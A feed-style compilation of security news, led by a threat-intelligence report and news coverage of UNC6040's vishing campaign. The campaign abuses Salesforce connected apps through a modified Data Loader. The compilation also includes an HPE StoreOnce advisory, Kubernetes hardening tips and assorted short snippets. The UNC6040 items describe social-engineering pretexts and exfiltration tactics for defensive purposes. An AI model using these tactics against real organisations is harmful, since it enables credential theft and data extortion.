In an active campaign, a financially motivated threat actor is voice phishing (Vishing) Salesforce customers to compromise their organizational data and carry out subsequent extortion. Tracked as UNC6040 by Google Threat Intelligence Group (GTIG), the threat actor group targets employees within English-speaking branches of multinational corporations to trick them into granting sensitive access or sharing credentials. “Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements,” GITG researchers said in a report shared with CSO ahead of its official release on Wednesday. Specifically, employees are being duped into approving malicious “connected app” – altered versions of Salesforce’s Data Loader, which, once authorized, give attackers direct access to exfiltrate large volumes of sensitive Salesforce data. None of the observed cases in the campaign found threat actors exploiting any Salesforce vulnerability, researchers noted. Abusing Salesforce’s App integration functionality The campaign centers on Salesforce’s Data Loader, a bulk data management tool that lets users import, export, update, delete, or insert large volumes of records within the Salesforce platform. It comes with both a user-friendly interface and a command-line option for advanced customization and automation. The tool supports OAuth and can be directly integrated as a “connected app” within Salesforce. According to GTIG, attackers are exploiting this by convincing victims, often during phone calls, to open the connected apps setup page and enter a connection code, effectively linking a rogue, attacker-controlled version of Data Loader to the victim’s Salesforce environment. The capability of using the modified versions of Data Loader was found consistent with a recent guidance Salesforce had issued on such abuses. On this occasion, GTIG researchers found that the capability and technique differed from one intrusion to another. “In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation,” researchers said. “In another case, numerous test queries were made with small chunk sizes initially. Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables.” Another trick involved naming the modified Data Loader “My Ticket Portal” to match the IT support pretext used during the Vishing calls. Lateral movement for further extortion After breaching Salesforce, the group moves laterally across cloud services, targeting tools like Okta, Microsoft 365, and Workplace to widen the scope of the breach. Researchers point out that, in some cases, extortion attempts have surfaced months after the initial intrusion, with the threat actors even claiming ties to the infamous group ShinyHunters, likely as a pressure tactic. The delay in extortion demands also hints that UNC6040 might be selling or handing off stolen data to other threat actors, who then use it for extortion, resale, or further attacks. GTIG findings suggest that UNC6040 may be a part of a larger criminal network, where different groups handle different stages of an attack. This is based on observed similarities in tactics, techniques, and procedures (TTPs) between UNC6040 and other threat actors linked to a loosely connected collective known as “The Com”, which Scattered Spider is part of. GTIG recommended steps under ‘shared responsibility’ GTIG noted that while platforms like Salesforce offer strong built-in protections, it’s up to the customers to properly configure access, manage permissions, and ensure users are trained according to best practices. A few cloud shared-responsibility best practices to consider include adhering to the principle of least privilege, monitoring access to connected applications, enforcing IP-based Access restrictions, and Multi-factor Authentication (MFA). UNC6040’s tactics aren’t isolated. Similar voice-driven social engineering campaigns have surfaced in recent months, including Scattered Spider’s hybrid Vishing attacks observed in May 2024, and the Letscall malware campaign in South Korea.

Introduction Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. This approach has proven particularly effective in tricking employees, often within English-speaking branches of multinational corporations, into actions that grant the attackers access or lead to the sharing of sensitive credentials, ultimately facilitating the theft of organization’s Salesforce data. In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce. A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal. This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version. This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats. In some instances, extortion activities haven't been observed until several months after the initial UNC6040 intrusion activity, which could suggest that UNC6040 has partnered with a second threat actor that monetizes access to the stolen data. During these extortion attempts, the actor has claimed affiliation with the well-known hacking group ShinyHunters, likely as a method to increase pressure on their victims. Figure 1: Data Loader attack flow UNC6040 GTIG is currently tracking a significant portion of the investigated activity as UNC6040. UNC6040 is a financially motivated threat cluster that accesses victim networks by voice phishing social engineering. Upon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application. Following this initial data theft, UNC6040 was observed leveraging end-user credentials obtained through credential harvesting or vishing to move laterally through victim networks, accessing and exfiltrating data from the victim's accounts on other cloud platforms such as Okta and Microsoft 365. Attacker Infrastructure  UNC6040 utilized infrastructure to access Salesforce applications that also hosted an Okta phishing panel. This panel was used to trick victims into visiting it from their mobile phones or work computers during the social engineering calls. In these interactions, UNC6040 also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration. Alongside the phishing infrastructure, UNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network. Overlap with Groups Linked to “The Com” GTIG has observed infrastructure across various intrusions that shares characteristics with elements previously linked to UNC6040 and threat groups suspected of ties to the broader, loosely organized collective known as "The Com". We’ve also observed overlapping tactics, techniques, and procedures (TTPs), including social engineering via IT support, the targeting of Okta credentials, and an initial focus on English-speaking users at multinational companies. It's plausible that these similarities stem from associated actors operating within the same communities, rather than indicating a direct operational relationship between the threat actors. Data Loader Data Loader is an application developed by Salesforce, designed for the efficient import, export, and update of large data volumes within the Salesforce platform. It offers both a user interface and a command-line component, the latter providing extensive customization and automation capabilities. The application supports OAuth and allows for direct "app" integration via the "connected apps" functionality in Salesforce. Threat actors abuse this by persuading a victim over the phone to open the Salesforce connect setup page and enter a "connection code," thereby linking the actor-controlled Data Loader to the victim's environment. Figure 2: The victim needs to enter a code to connect the threat actor controlled Data Loader Modifications  In some of the intrusions using Data Loader, threat actors utilized modified versions of Data Loader to exfiltrate Salesforce data from victim organizations. The proficiency with the tool and capabilities by executed queries seems to differ from one intrusion to another.  In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation. In another case, numerous test queries were made with small chunk sizes initially. Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables. There were also cases where the threat actors configured their Data Loader application with the name "My Ticket Portal", aligning the tool's appearance with the social engineering pretext used during the vishing calls. Outlook & Implications   Voice phishing (vishing) as a social engineering method is not, in itself, a novel or innovative technique; it has been widely adopted by numerous financially motivated threat groups over recent years with varied results. However, this campaign by UNC6040 is particularly notable due to its focus on exfiltrating data specifically from Salesforce environments. Furthermore, this activity underscores a broader and concerning trend: threat actors are increasingly targeting IT support personnel as a primary vector for gaining initial access, exploiting their roles to compromise valuable enterprise data. The success of campaigns like UNC6040's, leveraging these refined vishing tactics, demonstrates that this approach remains an effective threat vector for financially motivated groups seeking to breach organizational defenses.  Given the extended time frame between initial compromise and extortion, it is possible that multiple victim organizations and potentially downstream victims could face extortion demands in the coming weeks or months. Readiness, Mitigations, and Hardening  This campaign underscores the importance of a shared responsibility model for cloud security. While platforms like Salesforce provide robust, enterprise-grade security controls, it’s essential for customers to configure and manage access, permissions, and user training according to best practices. To defend against social engineering threats, particularly those abusing tools like Data Loader for data exfiltration, organizations should implement a defense-in-depth strategy. GTIG recommends the following key mitigations and hardening steps: Adhere to the Principle of Least Privilege, Especially for Data Access Tools: Grant users only the permissions essential for their roles—no more, no less. Specifically for tools like Data Loader, which often require the "API Enabled" permission for full functionality, limit its assignment strictly. This permission allows broad data export capabilities; therefore, its assignment must be carefully controlled. Per Salesforce's guidance, review and configure Data Loader access to restrict the number of users who can perform mass data operations, and regularly audit profiles and permission sets to ensure appropriate access levels. Manage Access to Connected Applications Rigorously: Control how external applications, including Data Loader, interact with your Salesforce environment. Diligently manage access to your connected apps, specifying which users, profiles, or permission sets can use them and from where. Critically, restrict powerful permissions such as "Customize Application" and "Manage Connected Apps"—which allow users to authorize or install new connected applications—only to essential and trusted administrative personnel. Consider developing a process to review and approve connected apps, potentially allowlisting known safe applications to prevent the unauthorized introduction of malicious ones, such as modified Data Loader instances. Enforce IP-Based Access Restrictions: To counter unauthorized access attempts, including those from threat actors using commercial VPNs, implement IP address restrictions. Set login ranges and trusted IPs, thereby restricting access to your defined enterprise and VPN networks. Define permitted IP ranges for user profiles and, where applicable, for connected app policies to ensure that logins and app authorizations from unexpected or non-trusted IP addresses are denied or appropriately challenged. Leverage Advanced Security Monitoring and Policy Enforcement with Salesforce Shield: For enhanced alerting, visibility, and automated response capabilities, utilize tools within Salesforce Shield. Transaction Security Policies allow you to monitor activities like large data downloads (a common sign of Data Loader abuse) and automatically trigger alerts or block these actions. Complement this with "Event Monitoring" to gain deep visibility into user behavior, data access patterns (e.g., who viewed what data and when), API usage, and other critical activities, helping to detect anomalies indicative of compromise. These logs can also be ingested into your internal security tools for broader analysis. Enforce Multi-Factor Authentication (MFA) Universally: While the social engineering tactics described may involve tricking users into satisfying an MFA prompt (e.g., for authorizing a malicious connected app), MFA remains a foundational security control. Salesforce states that "MFA is an essential, effective tool to enhance protection against unauthorized account access" and requires it for direct logins. Ensure MFA is robustly implemented across your organization and that users are educated on MFA fatigue tactics and social engineering attempts designed to circumvent this critical protection. By implementing these measures, organizations can significantly strengthen their security posture against the types of vishing and the UNC6040 data exfiltration campaign detailed in this report. Regularly review Salesforce’s security documentation, including the Salesforce Security Guide for additional detailed guidance. Read our vishing technical analysis for more details on the vishing threat, and strategic recommendations and best practices to stay ahead of it.

Did somebody say ransomware? Not the newspaper group, not even to deny it Regional newspaper publisher Lee Enterprises says data belonging to around 40,000 people was stolen during an attack on its network earlier this year.

Agentic AI systems could threaten security and data privacy, unless organizations test each model and component

Hewlett Packard Enterprise (HPE) addressed multiple flaws in its StoreOnce data backup and deduplication solution. HPE has released security patches for eight vulnerabilities in its StoreOnce backup solution. These issues could allow remote code execution, authentication bypass, data leaks, and more. “Potential security vulnerabilities have been identified in HPE StoreOnce Software.” reads the advisory. “These […]

Severity: Medium Updates address a vulnerability that could lead to authenticated remote code execution Security update addresses a critical severity security vulnerability in Roundcube Webmail Updated: 05 Jun 2025

In today’s complex threat landscape, endpoint visibility and risk-based access control are cornerstones of effective cybersecurity. That’s why we’re thrilled to announce our upcoming integration with CrowdStrike, a leader in endpoint protection and zero trust security. This partnership brings enhanced risk intelligence into Portnox’s cloud-native NAC solution, enabling security teams to enforce access policies based on… The post Zero Trust, Full Confidence: Portnox and CrowdStrike Together appeared first on Portnox.

AUSTIN, TX – June 4, 2025 — Portnox, a leading provider of cloud-native, zero trust access control solutions, announced a new integration with CrowdStrike, a leader in endpoint protection and zero trust security. This strategic partnership enhances Portnox’s cloud-native Network Access Control (NAC) solution by incorporating CrowdStrike’s trusted device telemetry and Zero Trust Assessment (ZTA)… The post Portnox and CrowdStrike Integration Fortifies Customer Cybersecurity Posture with Enhanced Risk-Based Access Control appeared first on Portnox.

The General Services Administration is seeking price breakdowns and other information from 10 technology product suppliers as part of GSA's OneGov push to streamline procurement.

In this fifth installment of Tenable’s “Stronger Cloud Security in Five” blog series, we offer three best practices for quickly hardening your Kubernetes environment’s security in GCP: remove wide inbound access to cluster APIs; remove root permissions from containers; and remove privileged permissions from publicly accessible groups. Securing your Kubernetes environment is critical in order to protect your cloud application development lifecycle and your container orchestration. However, properly configuring and managing Kubernetes is complicated, and this often leads to lax security controls that put organizations at an elevated risk for a breach.As the “Tenable Cloud Risk Report 2024” found, security weaknesses in Kubernetes environments aren’t the exception – they’re the norm:78% of organizations have publicly accessible Kubernetes API servers, and 41% of those are set to allow inbound internet access.44% run privileged containers, which have access to the host’s resources and kernel capabilities, making them a major risk if attackers gain access to them.58% have cluster-admin role bindings, which give some users complete control over all of their organizations’ Kubernetes environments.Here we outline three best practices that take no more than five minutes to implement and that’ll quickly boost the security of your Google Cloud Platform’s (GCP) Kubernetes environment. Read on!Remove wide inbound access to clusters’ APIsThe Google Kubernetes Engine (GKE) API lets you query and manipulate the state of API objects in Kubernetes. Thus, you should configure its authorized networks setting so it restricts inbound internet access to specific IP addresses. Otherwise, if the authorized network setting is disabled, any public IP address can access the Kubernetes API without any restrictions, creating a significant risk for malicious users to tamper with the API. If you don't use a mechanism to restrict access to your cluster's control plane, it may be exposed to network access publicly.One way this can be mitigated is to limit the authorized networks that can access the control plane in this way: In the GCP Portal, open the resource page of GKE cluster.Under the “Networking - Control plane authorized networks” setting, click the pencil button.Check “Enable control plane authorized networks.”Edit the “Authorized Networks” to allow access only to specific IP addresses that require access to the Kubernetes API.Click “Save Changes” to confirmBy taking these steps, you shrink your Kubernetes clusters’ attack surface and reduce the risk that hackers will breach the control plane via brute-force attacks, API vulnerability exploitation and other attack methods.Remove privileged permissions from containers If attackers exploit a vulnerability in a privileged container’s application, they could control the container’s host and wreak havoc in your Kubernetes environment. For example, attackers could tamper with host devices and kernel parameters, and make malicious OS system calls, such as retrieving files and disabling security controls. That’s why we don’t recommend running privileged containers. You should evaluate Kubernetes workloads and flag every container spec that has the securityContext.privileged flag set to “true,” as shown in the screenshot below. (Source: Tenable)Here’s how you remediate this:For each deployment where a container is provisioned with a privileged security context, set the flag for "privileged" to “false.” Add a Pod Security Standard policy to the namespace default.Remove privileged permissions from publicly accessible groupsYou should be aware that the groups like system:anonymous user and system:unauthenticated can be used by anyone with access to the cluster. In GKE, the system:authenticated group, though it may sound more secure, actually allows access to anyone who can identify with any Google identity (e.g., a Gmail account), making it public. (Source: Google’s “Best practices for GKE RBAC” documentation) Unfortunately, it’s quite common for organizations to inadvertently grant these groups privileged access, which opens the door for potentially anyone on the internet to access critical resources in your Kubernetes environment. In addition, combining this with the first issue we discussed — unrestricted network access to the cluster's control plane — grants permissions that can be leveraged by anyone with network access to the control plane, which in turn has network access from anywhere. This dangerous scenario puts your organization at an elevated risk for a breach if attackers exploit a security flaw in your Kubernetes environment, such as a container pod with a critical vulnerability.To remedy this simply remove any unnecessary role bindings from the publicly accessible groups.ConclusionWe hope you’ve found these three Kubernetes security “quick win” tips helpful and valuable. They’re just a small sample of the comprehensive Kubernetes security best practices our cloud security experts can help you adopt and automate with our Tenable Cloud Security cloud native application protection platform (CNAPP).With Tenable Cloud Security, you can streamline and simplify core Kubernetes security elements across multi-cloud environments, including:Obtaining comprehensive, continuously updated visibility into all your resourcesControlling access to clusters and enforcing least-privilege accessEnforcing policy and configuration control at scaleDetecting container vulnerabilities and malwareAutomating remediation and mitigation of security issues, including misconfigurations, policy violations and overprivileged identitiesFind out how you can take action to boost your Kubernetes and your overall multi-cloud security in just five minutes.Learn more:"Stronger Cloud Security in Five: The Importance of Cloud Configuration Security""Stronger Cloud Security in Five: How To Protect Your Cloud Workloads""Stronger Cloud Security in Five: Securing Your Cloud Identities"“Stronger Cloud Security in Five: How DSPM Helps You Discover, Classify and Secure All Your Data Assets”

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in...

As artificial intelligence solutions become ubiquitous, AI security is a key consideration for organizations that want to leverage AI as... The post Practical AI security in multi-cloud environments appeared first on Sysdig.

As artificial intelligence solutions become ubiquitous, AI security is a key consideration for organizations that want to leverage AI as... The post Practical AI security in multi-cloud environments appeared first on Sysdig.

Hacendado, a prominent Spanish brand primarily associated with Mercadona, one of Spain’s largest supermarket chains, has allegedly fallen victim to a significant data breach. An unauthorized actor claims to have exploited a zero-day vulnerability within a third-party logistics and inventory management system integrated with Hacendado’s backend infrastructure, leading to the compromise of extensive user data. […]

Success in the cloud depends less on adoption and more on agility. Recent industry trends point to emerging data management challenges across cloud service providers and legacy infrastructure, often all at once. This requires a shift in how organizations approach cloud strategies—strategically and proactively. Modern...

Vendor email compromise (VEC) attacks are bypassing traditional defenses by exploiting human trust rather than technical vulnerabilities, according to a new report by Abnormal AI. The data in the report shows that 72% of employees at large enterprises engaged with fraudulent vendor emails — replying or forwarding messages that contain no links or attachments. This behavior has fueled attempted thefts topping $300 million globally over the past year, with VEC attacks now showing 90% higher engagement rates than traditional business email compromise (BEC). The Europe, Middle East, and Africa (EMEA) region has emerged as ground zero for this growing threat. While EMEA employees interact with VEC scams more than any other region, they report just 0.27% of these incidents, the lowest reporting rate worldwide. The telecom sector appeared most vulnerable, with 71.3% employee engagement, followed by energy and utilities at 56.25%, according to the report. “Email-based social engineering has never been more convincing or more effective,” Mike Britton, CIO at Abnormal AI, said in a press statement. “Attackers are hijacking legitimate vendor threads and crafting sophisticated messages that slip past legacy defenses. Because employees believe these emails are genuine, they are engaging with them at alarming rates.” The report uncovered particularly risky behavior among EMEA’s junior sales teams, who engage with 86% of VEC attempts. While organizations detect and report 4.22% of traditional BEC attacks, a staggering 98.5% of VEC scams go unreported, often only discovered after financial damage occurs. This stands in sharp contrast to the Asia-Pacific (APAC) regions, where BEC remains the dominant threat with 44.4% employee engagement rates. Sujit Dubal, an analyst at QKS Group, said, “Gen AI has elevated VEC attacks to surgical precision. We’re no longer talking about obvious phishing attempts – these are meticulously crafted business communications that circumvent multi-factor authentication and other security measures.”  AI amplifies threat complexity Unlike traditional phishing, VEC attacks mimic legitimate business email threads, often generated using AI to replicate tone, branding, and message history with high accuracy. With no obvious triggers for detection, these emails bypass filters and fool even cautious employees, who, in a tight job market, often rush to resolve perceived issues like missed payments. “Existing controls like multi-factor authentication are failing against these AI-powered attacks,” Dubal warned. “We need a fundamental strategy shift that addresses psychological manipulation, not just credential verification.” Perimeter defenses alone can’t stop this AI-driven VEC, he added. “Organizations need three critical upgrades: AI-powered email analytics that detect subtle inconsistencies, active vendor verification protocols, and retrained employees who recognize social engineering, not just technical threats.” While VEC volume remains lower than phishing or ransomware, its success rate—and potential financial impact—is far greater. “Weaponized AI makes it easier than ever to impersonate trusted vendors,” Britton added, urging organizations to “move beyond reactive training and adopt proactive defenses that block threats before they reach the inbox” to prevent costly human error.

Business Builders gamifies learning to help enhance students' analytical and decision-making skills using SAP Analytics Cloud.

Traditional data leakage prevention (DLP) tools aren't keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks...

CrowdStrike and Microsoft hope to "bring clarity and coordination" to the cyber industry by unifying threat group naming conventions.

We have entered the agentic AI era, where for the first time, intelligent, autonomous systems will be capable of automating entire workflows in every industry.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Websites “Luigi was right” and “The CEO Database” share the information of CEOs and executives.

Today, your internet presence is much more than just a website or social media profile, it’s like your…

Hewlett Packard Enterprise (HPE) has issued a new security advisory addressing eight newly discovered vulnerabilities in its StoreOnce data backup and deduplication platform. Among these, the most severe is an authentication bypass vulnerability tracked as CVE-2025-37093, which carries a near-maximum CVSS score of 9.8, indicating a critical risk to affected systems.  In a security bulletin (document ID: HPESBST04847 rev.1), HPE outlined that multiple versions of its StoreOnce Virtual Storage Appliance (VSA), particularly those prior to version 4.3.11, are vulnerable to a range of remote exploitation risks. These include remote code execution (RCE), server-side request forgery (SSRF), arbitrary file deletion, information disclosure, directory traversal, and authentication bypass.  “These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass, arbitrary file deletion, and directory traversal information disclosure,” HPE warned in the advisory.  Spotlight on CVE-2025-37093: A Critical StoreOnce Vulnerability  The most concerning among the identified threats is CVE-2025-37093, a critical StoreOnce vulnerability. This flaw affects all software versions prior to 4.3.11 and enables unauthenticated attackers to bypass authentication mechanisms and gain unauthorized access to systems.  HPE stated that this vulnerability was reported on October 31, 2024, by an anonymous researcher in collaboration with the Trend Micro Zero Day Initiative (ZDI). The vulnerability, cataloged under ZDI-CAN-24985, is now patched in the newly released software version.  With a CVSS v3.1 vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, the CVE-2025-37093 vulnerability in StoreOnce poses a serious threat due to its low attack complexity and lack of user interaction required.  Full List of Vulnerabilities  Besides CVE-2025-37093, the advisory highlights the following security issues:  CVE-2025-37089 (ZDI-CAN-24981) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37090 (ZDI-CAN-24982) – Server-Side Request Forgery (CVSS: 5.3)  CVE-2025-37091 (ZDI-CAN-24983) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37092 (ZDI-CAN-24984) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37094 (ZDI-CAN-25314) – Directory Traversal / Arbitrary File Deletion (CVSS: 5.5)  CVE-2025-37095 (ZDI-CAN-25315) – Directory Traversal / Information Disclosure (CVSS: 4.9)  CVE-2025-37096 (ZDI-CAN-25316) – Remote Code Execution (CVSS: 7.2)  Each of these poses various degrees of threat, but it is CVE-2025-37093, the authentication bypass flaw, that requires immediate attention due to its potential to grant full access to unprivileged attackers without requiring credentials.  Who Is Affected and How to Mitigate  Systems running HPE StoreOnce VSA software versions earlier than 4.3.11 are directly impacted. These installations are urged to upgrade to version 4.3.11 or later, which contains the necessary patches to remediate all eight vulnerabilities, including CVE-2025-37093.  While HPE has made the updated software available through the HPE Support Center, organizations are also advised to adhere to their internal patch management protocols when applying third-party patches.   Conclusion   The recent disclosure of multiple vulnerabilities in HPE’s StoreOnce software, most notably the critical authentication bypass flaw tracked as CVE-2025-37093, highlights a pressing security concern for organizations relying on this widely used backup solution. The flaws expose systems to risks such as remote code execution and unauthorized access. With attackers increasingly targeting backup infrastructure to gain deeper access into networks or sabotage recovery efforts, unpatched StoreOnce deployments present a tempting target. Immediate action to upgrade to the patched version is not just advisable—it’s essential for any organization looking to protect sensitive data and maintain operational resilience.

A critical flaw in Roundcube webmail, undetected for 10 years, allows attackers to take over systems and execute arbitrary code. A critical flaw, tracked as CVE-2025-49113 (CVSS score of 9.9) has been discovered in the Roundcube webmail software. The vulnerability went unnoticed for over a decade, an attacker can exploit the flaw to take control […]

Mobile apps often request more access than they need, exposing businesses to unnecessary risk. Dangerous permissions let Android apps tap into sensitive user data and device functions such as reading messages, recording audio, accessing stored files or tracking real-time location. On iOS, dangerous entitlements grant apps elevated privileges that can bypass built-in security controls and […] The post How Dangerous Mobile App Permissions Threaten Enterprise Security appeared first on NowSecure.

Chunghwa Telecom and Netlock customers must look elsewhere for new certificates.

As AI becomes more independent, new risks emerge. How do we navigate this next frontier responsibly?

What comes to your mind when you think of Photoshop? A tool for editing and retouching photos –…

President Donald Trump has proposed building a massive antimissile system in space that could enrich Elon Musk if it materializes. But experts say the project’s feasibility remains unclear.

Kettering Health, a significant Ohio-based healthcare network, has allegedly suffered a major data breach at the hands of the Interlock ransomware group. The group has now reportedly published a substantial 2.6 TB of data, purportedly belonging to the healthcare provider. This development follows earlier reports around May 20-21, 2025, when Kettering Health experienced significant operational […]

Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx,...

A simple customer query leads to a rabbit hole of backdoored malware and game cheats

Seems bad out there. Unfortunately, it can always get worse. From evil hacker AI to world-changing cyberattacks, WIRED envisions the future you haven't prepared for.

Everyone knows what it’s like to lose cell service. A burgeoning open source project called Meshtastic is filling the gap for when you’re in the middle of nowhere—or when disaster strikes.

In the very near future, victory will belong to the savvy blackhat hacker who uses AI to generate code at scale.

GPS jamming and spoofing attacks are on the rise. If the global navigation system the US relies on were to go down entirely, it would send the world into unprecedented chaos.

A major cyberattack on the US electrical grid has long worried security experts. Such an attack wouldn’t be easy. But if an adversary pulled it off, it’d be lights out in more ways than one.

A quantum computer will likely one day be able to break the encryption protecting the world's secrets. See how much faster such a machine could decrypt a password compared to a present-day supercomputer.

The easy access that scammers have to sophisticated AI tools means everything from emails to video calls can’t be trusted.

A prominent Australian healthcare provider, Epworth HealthCare, has allegedly been targeted by a global ransomware group. Epworth HealthCare is a leading not-for-profit private hospital group in Victoria, known for its high-quality medical, surgical, and rehabilitation services. Established in 1920, the organization operates major hospitals across Melbourne and Geelong, playing a significant role in the region’s […]

Government details latest initiative following announcement last week Revealing more details about the Cyber and Electromagnetic (CyberEM) military domain, the UK's Ministry of Defence (MoD) says "there are pockets of excellence" but improvements must be made to ensure the country's capability meets the needs of national defense.

An Indian platform, tradgo.in, has allegedly been compromised, with a threat actor claiming to be selling a comprehensive database of the company on an online forum. Tradgo.in appears to be a platform involved in financial transactions, Aadhaar-based services, and user data management, making it a significant entity handling sensitive personal and financial information for its […]

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities (KEV) catalog. This week, Qualcomm addressed the above zero-day vulnerabilities that, according to the company, have been exploited in limited, […]

Shift in cyberattack focus puts APAC region under growing pressure.

Rare earths have received a lot of attention this year. Like cybersecurity, they are increasingly considered critical to national security, setting up an interesting comparison of two seemingly disparate items that share several important strategic and geopolitical similarities. For example, both rare earths and cybersecurity are considered strategic assets essential for military and defense technologies. Hence both have become key investment targets for nations looking to increase self-sufficiency and reduce dependencies. There also have a common theme around supply chain vulnerabilities. Both face significant supply chain risks and concentration problems. Currently, rare earths production is dominated by China, while cybersecurity often depends on key technologies or expertise concentrated in specific countries. Both also have supply and demand concerns. Rare earths face physical scarcity and extraction challenges, while cybersecurity faces a scarcity of qualified talent and expertise, with the 2024 ISC2 Cybersecurity Workforce Study estimating a shortage of 4.76 million cybersecurity professionals. To put that staggering number into perspective: The estimated cybersecurity workforce is 5.45 million professionals; hence, according to ISC2, 46% of necessary cyber roles are unfilled. Indeed, that quantifies the rarity of cybersecurity resources. Moreover, both rare earths and cybersecurity requirecomplex technical expertise — each field requires highly specialized knowledge that takes significant time and investment from enterprises and government agencies to develop. The cybersecurity shortfall will take several generations to address. Both domains represent areas where technology capabilities, resource access, and security concerns are intersecting in our increasingly technology-dependent world. Due to these factors, there is increasing regulatory attention evolving around both as governments recognize their strategic importance. Cybersecurity’s ‘rarest earths’ Rare earths comprise about 17 natural elements, each of which has become mandatory for modern technology and warfare, such as smartphones, weapon precision guiding systems, magnets for wind farms and EV motors, plus many other use cases. But not all rare earths are equal, and there are four or five that are considered the rarest. This analogy can extend to certain cybersecurity skills, which although all critical for modern security differ in their level of rarity. The following can be considered the “rarest earths” of the cybersecurity world. Advanced threat hunting expertise Like the rarest elements, professionals who can proactively identify novel threats and adversary techniques before they cause damage are scarce and extremely valuable. Why are these skills rare? Many factors have led to this scenario: Complex skill requirements: Effective threat hunters need a unique combination of skills, including deep cyber knowledge, programming proficiency, data analysis capabilities, and the ability to understand the attacker mindset. Business and industry context: Great threat hunters also need to understand the business context of their environment to prioritize what matters — an even rarer expertise. Deep experience: Threat hunting relies heavily on pattern recognition and intuition that develops only through years of hands-on experience. Few formal training paths: Unlike other cybersecurity specialties, there are limited structured educational programs specifically for threat hunting; you must learn on the job. Quantum computing security As quantum computing risk emerges, experts who understand how to develop post-quantum cryptography are becoming the “critical elements” for future security. Many of the above points for threat hunters also apply. But let me highlight that there are very few crypto experts that are also good at driving change, and this will be required for the post-quantum remediation, which will be the equivalent of large mega transformation programs. Being able to speak technology to understand these new algorithms and protocols while at the same time speaking business language is a hard combination to find. Nation-state threat intelligence Cyber analysts who can attribute and understand sophisticated state-sponsored attacks are in extremely limited supply. This is, if you like, the “Top Gun” of the class. To get to this level then you will need: Geopolitical expertise: Effective analysts must understand global politics to properly contextualize and predict nation-state activities. Language and cultural fluency: Analysis often requires foreign languages specific to target nations. Direct exposure: Very few security professionals get hands-on experience with confirmed nation-state incidents; plus, attribution is always going to be extremely difficult. With nation-state actors increasingly targeting private organizations, this skill set will only become harder to compete for in the open talent market. A way forward As organizations and nations develop their cybersecurity strategies, the ability to identify and nurture these “rare earth” cyber skills such as advanced threat hunting, quantum security, and nation-state cyber intelligence becomes as strategically important as securing physical supply chains for critical minerals. This won’t be resolved quickly, and you will be tempted to see if AI can help fill this gap. Yes, AI can augment challenging cyber activities like advanced threat hunting, but it can’t fully replace human expertise.  Our human threat hunters remain essential for several reasons: Adversarial creativity: Sophisticated nation-state attackers constantly develop novel techniques specifically designed to evade automated detection. Human intuition is necessary to spot these shifts. Contextual understanding: Humans can understand organizational contexts, processes, and political motivations that AI currently struggles to fully comprehend. Investigative intuition: Fully trained threat hunters develop a “sixth sense” about which leads to pursue, and which unusual patterns might indicate genuine threats versus a false positive. It is hard for AI to learn this. Attribution expertise: Determining who is behind an attack, especially nation-state actors, requires judgment about motivations, techniques, and geopolitical context. Not an easy task for AI at this time. In the end the most effective approach will probably be a hybrid human-AI partnership where we combine the two strengths.   For example, AI can handle the “data rich” detection and correlation work, while our human experts evaluate findings and make final determinations. Plus, humans can adapt to evolving threats and see whether new patterns emerge. This combination leverages collective strengths. More importantly, it is a combination that we CISOs hope can be a more common asset for our defensive strategies than  we are experiencing separately today. See also: Two ways AI hype is worsening the cybersecurity skills crisis The cybersecurity skills gap reality: We need to face the challenge of emerging tech CISOs rethink hiring to emphasize skills over degrees and experience The 7 most in-demand cybersecurity skills today

Security Advisory Description The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger ...

